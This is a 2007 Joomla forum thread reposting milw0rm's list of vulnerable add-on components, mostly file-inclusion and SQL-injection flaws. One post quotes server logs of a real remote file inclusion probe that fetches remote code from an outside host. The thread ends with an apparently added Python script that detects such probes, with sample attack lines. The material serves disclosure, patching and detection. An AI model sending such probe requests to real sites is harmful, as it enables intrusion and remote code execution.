| Joomla! http://forum.joomla.org/ |
|
| milw0rm dot com - List of Vulnerable 3rd Party Add-ons [2006/2007] http://forum.joomla.org/viewtopic.php?f=296&t=215577 |
| Author: | gustavo [ Sun Sep 23, 2007 4:08 pm ] |
| Post subject: | milw0rm dot com - List of Vulnerable 3rd Party Add-ons [2006/2007] |
2007-10-10 - Joomla Component JContentSubscription 1.5.8 - Remote File Inclusion Vulnerability
2007-10-10 - Joomla Component MP3 Allopass 1.0 - Remote File Inclusion Vulnerability
2007-10-08 - Joomla component MOSMediaLite451 - Remote File Inclusion Vulnerability
2007-10-07 - Joomla Component wmtportfolio 1.0 - Remote File Inclusion Vulnerability
2007-10-07 - Joomla Flash Image Gallery Component - Remote File Inclusion Vulnerability
2007-10-06 - Joomla panoramic component 1.0 - Remote File Inclusion Vulnerability
2007-09-21 - Joomla Component com_slideshow - Remote File Inclusion Vulnerability
2007-09-16 - Joomla Component joom12Pic 1.0 - Remote File Inclusion Vulnerability
2007-09-15 - Joomla Component Flash Fun! 1.0 - Remote File Inclusion Vulnerability
2007-09-13 - Joomla Component joomlaradio v5 - Remote File Inclusion Vulnerability
2007-09-08 - Joomla Component Restaurante - Remote File Upload Vulnerability
2007-09-01 - Joomla! 1.5 Beta1/Beta2/RC1 - Remote SQL Injection Exploit
2007-08-23 - Joomla Component BibTeX <= 1.3 - Remote Blind SQL Injection Exploit
2007-08-23 - Joomla Component EventList <= 0.8 (did) - SQL Injection Vulnerability
2007-08-23 - Joomla Component Nice Talk <= 0.9.3 (tagid) - SQL Injection Vulnerability
2007-08-23 - Joomla Component RSfiles <= 1.0.2 (path) - File Download Vulnerability
2007-08-23 - Joomla Component NeoRecruit <= 1.4 (id) - SQL Injection Vulnerability
2007-07-31 - Joomla Component com_gmaps 1.00 (mapId) - Remote SQL Injection
2007-07-22 - Joomla! CMS 1.5 beta 2 (search) - Remote Code Execution Vulnerability
2007-07-19 - Joomla Component Pony Gallery <= 1.5 - SQL Injection Vulnerability
2007-07-18 - Joomla Component Expose <= RC35 - Remote File Upload Vulnerability
2007-05-28 - Joomla Component Phil-a-Form <= 1.2.0.0 - SQL Injection Exploit
2007-04-23 - Joomla 1.5.0 Beta (pcltar.php) - Remote File Inclusion Vulnerability
2007-04-17 - Joomla Template Be2004-2 (index.php) - Remote File Inclusion Vulnerability
2007-04-17 - Joomla Component JoomlaPack 1.0.4a2 RE (CAltInstaller.php) - Remote File Inclusion Vulnerability
2007-04-14 - Mambo/Joomla Component Article 1.1 - Remote File Include Exploit
2007-04-14 - Joomla Module AutoStand 1.0 R - Remote File Inclusion Vulnerability
2007-04-11 - Joomla Component mosMedia <= 1.0.8 - Remote File Inclusion Vulnerability
2007-04-10 - Joomla/Mambo Component Taskhopper 1.1 - Remote File Include Exploit
2007-03-27 - Joomla Component D4JeZine <= 2.8 - Remote BLIND SQL Injection Exploit
2007-03-24 - Joomla Component RWCards <= 2.4.3 - Remote SQL Injection Exploit
2007-03-24 - Joomla Component Car Manager <= 1.1 - Remote SQL Injection Exploit
2007-03-23 - Joomla Component Joomlaboard 1.1.1 (sbp) - Remote File Inclusion Vulnerability
2007-03-23 - Joomla/Mambo Component SWmenuFree 4.0 - Remote File Inclusion Vulnerability
2006-11-17 - MosReporter Joomla Component 0.9.3 - Remote File Inclusion Vulnerability
2006-08-19 - Joomla <=1.0.10 (poll component) - Arbitrary Add Votes Exploit
2006-08-18 - Joomla Kochsuite Component <= 0.9.4 - Remote File Inclusion Vulnerability
2006-08-18 - Joomla Link Directory Component <= 1.0.3 - Remote File Inclusion Vulnerability
2006-08-18 - Joomla Artlinks Component <= 1.0b4 - Remote File Inclusion Vulnerability
2006-08-17 - Joomla Mosets Tree <= 1.0 - Remote File Inclusion Vulnerability
2006-08-17 - Joomla com_jim Component <= 1.0.1 - Remote File Inclusion Vulnerability
2006-08-13 - Joomla Webring Component <= 1.0 - Remote File Inclusion Vulnerability
2006-08-07 - Joomla JD-Wiki Component <= 1.0.2 - Remote File Inclusion Vulnerability
2006-07-30 - Joomla LMO Component <= 1.0b2 - Remote File Inclusion Vulnerability
2006-07-30 - Joomla com_bayesiannaivefilter Component <= 1.1 - Remote File Inclusion Vulnerability
2006-06-17 - Joomla <= 1.0.9 (Weblinks) - Remote Blind SQL Injection Exploit
2006-04-19 - Mambo <= 4.5.3 , Joomla <=1.0.7 (feed) - Denial of Service Exploit

*RFI: Remote File Inclusion |
|
| Author: | gustavo [ Sat Oct 06, 2007 6:42 pm ] |
| Post subject: | Re: milw0rm dot com - List of Vulnerable 3rd Party Add-ons [2006/2007] |
Add:
2007-10-06 Joomla panoramic component 1.0 - Remote File Inclusion Vulnerability
Component : Joomla panoramic component - version 1.0
site: webmaster-tips.net/panoramic-picture-viewer.html |
|
| Author: | K1u [ Sat Oct 06, 2007 7:01 pm ] |
| Post subject: | Re: milw0rm dot com - List of Vulnerable 3rd Party Add-ons [2006/2007] |
It is always great to see the vulns so you may patch them yourself
|
|
| Author: | gustavo [ Tue Oct 09, 2007 3:42 am ] |
| Post subject: | Re: milw0rm dot com - List of Vulnerable 3rd Party Add-ons [2006/2007] |
add
2007-10-08 - Joomla component MOSMediaLite451 Remote File Inclusion Vulnerability
Component : MOSMediaLite451
site: djoomla.com/component/option,com_remository/Itemid,2/func,fileinfo/id,104/

add
2007-10-07 - Joomla Component wmtportfolio 1.0 Remote File Inclusion Vulnerability
Component : WMT Portfolio - version 1.0
site: webmaster-tips.net/wmt-joomla-component-portfolio.html

add
2007-10-07 - Joomla Flash Image Gallery Component Remote File Inclusion Vulnerability
Component : Flash Image Gallery
site: webmaster-tips.net/flash-image-gallery.html |
|
| Author: | gustavo [ Thu Oct 11, 2007 2:30 pm ] |
| Post subject: | Re: milw0rm dot com - List of Vulnerable 3rd Party Add-ons [2006/2007] |
add
2007-10-10 - Joomla Component JContentSubscription 1.5.8 - Remote File Inclusion Vulnerability
Component : JContentSubscription
site: joomlaequipment.com/index.php?option=com_content&task=view&id=7&Itemid=34

add
2007-10-10 - Joomla Component MP3 Allopass 1.0 - Remote File Inclusion Vulnerability
Component : JContentSubscription
site: joomlaratings.com |
|
| Author: | Xirtam [ Wed Nov 14, 2007 12:46 pm ] |
| Post subject: | Re: milw0rm dot com - List of Vulnerable 3rd Party Add-ons [2006/2007] |
Are you sure that joomlaradio v4 is OK? My site is suspended because it is somehow hacked. I found this in the logs:

Quote:
213.173.251.138 - - [13/Nov/2007:00:16:01 +0100] "GET //index.php?option=com_restaurante&task=http://hivhash.com/hiv//ws/phpmic.txt.txt? HTTP/1.1" 200 724 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"

Quote:
213.173.251.138 - - [13/Nov/2007:00:16:34 +0100] "GET /index.php/weblinks/Joomla//index.php?option=com_restaurante&task=http://hivhash.com/hiv//ws/phpmic.txt.txt? HTTP/1.1" 404 5938 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"

Quote:
213.173.251.138 - - [13/Nov/2007:00:28:18 +0100] "GET /index.php//index.php?option=com_restaurante&task=http://hivhash.com/hiv//ws/phpmic.txt.txt? HTTP/1.1" 200 12748 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"

I am not using the com_restaurante component, never heard of it. |
|
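The log lines quoted in the post above carry a remote URL as the value of a query parameter, which is the pattern remote file inclusion probing leaves in an access log. The following is an added example, not part of the thread or of any Joomla code: a Python triage script that finds such requests in Apache combined-format logs and notes whether the targeted component is installed at all. The function name, the `installed` set and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

# Apache "combined" log line: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
# A parameter value that is itself a remote URL is the tell-tale of an RFI probe.
REMOTE_URL = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def find_rfi_probes(lines, installed=frozenset()):
    """Return one record per query parameter whose decoded value is a remote URL.

    `installed` is the set of com_* components actually present on the site
    (an assumption supplied by the caller, e.g. from the components directory).
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        # Split on the first '?' by hand: targets such as '//index.php?...'
        # confuse generic URL parsers, and probes often end in a second '?'.
        query = m['target'].partition('?')[2]
        params = parse_qsl(query, keep_blank_values=True)  # also percent-decodes
        component = dict(params).get('option', '')
        for name, value in params:
            if REMOTE_URL.match(value):
                hits.append({
                    'ip': m['ip'], 'time': m['time'], 'status': int(m['status']),
                    'component': component, 'param': name, 'remote': value,
                    # A 200 only means index.php answered; it does not prove the
                    # include ran. A hit on an installed component needs review first.
                    'installed': component in installed,
                })
    return hits

# Constructed sample lines (documentation IPs and a placeholder host).
SAMPLE = [
    '203.0.113.7 - - [13/Nov/2007:00:16:01 +0100] "GET //index.php?option=com_restaurante&task=http://attacker.example/x.txt? HTTP/1.1" 200 724 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [13/Nov/2007:00:16:34 +0100] "GET /index.php?option=com_example&path=http%3A%2F%2Fattacker.example%2Fx.txt%3F HTTP/1.1" 404 5938 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [13/Nov/2007:00:20:00 +0100] "GET /index.php?option=com_content&task=view&id=7 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for hit in find_rfi_probes(SAMPLE, installed={'com_content'}):
        print(hit)
```

Records with `installed` set to False are scans against components the site does not have; records naming an installed component are the ones to check against the list at the top of the thread.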
| All times are UTC |
|